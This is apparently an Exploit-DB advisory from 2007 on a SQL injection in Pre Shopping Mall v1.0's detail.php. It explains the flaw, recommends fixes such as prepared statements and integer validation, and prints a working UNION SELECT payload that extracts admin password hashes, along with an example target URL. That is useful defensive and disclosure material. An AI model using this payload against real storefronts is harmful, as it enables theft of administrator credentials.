Vendor: Pre Shopping Mall
Found by: Cyber-Security.org
CVSS: 7.5 (HIGH)
Vulnerability class: Remote SQL Injection
CWE: CWE-89
Product Name: Pre Shopping Mall
Affected Version From: Pre Shopping Mall v1.0
Affected Version To: Pre Shopping Mall v1.0
Patch Exists: NO
Related CWE: not listed
CPE: not listed
Metasploit: not listed
Other Scripts: not listed
Platforms Tested: not listed
Year: 2007

Pre Shopping Mall v1.0 Remote SQL Injection

detail.php reads the prodid parameter from the query string and places it directly into the SQL statement that looks up the product, without validating it or quoting it. Because the value is used as a bare number, an attacker can end the intended comparison with -1 (which matches no product) and append a UNION SELECT that reads the password column of the admin table. The published payload uses /**/ comment sequences in place of spaces (so a filter that only looks for whitespace does not stop it), supplies 17 columns so that the UNION matches the width of the product query, places password in the fourth position so that it is rendered where the page normally shows a product field, and ends with /* to comment out whatever the original query appends. The product detail page then displays the admin user's password hash as stored in the admin table.

Mitigation:

No vendor patch is listed, so the fix has to be made in the application code: validate prodid as a plain integer before use (reject anything that is not a string of digits) and pass it to the database as a bound parameter of a prepared statement instead of concatenating it into the query. Stripping spaces or blacklisting keywords is not enough; the published payload already avoids spaces by using /**/ comments. As defence in depth, give the public storefront a database account that cannot read the admin table, store admin passwords with a salted, slow hash so that a leaked value is of limited use, and keep the application and its dependencies updated.
Source

Exploit-DB raw data:

==============================================

Pre Shopping Mall v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
detail.php?prodid=-1/**/union/**/select/**/0,1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

==============================================

Example: http://preproject.com/emall/

==============================================

# milw0rm.com [2007-05-03]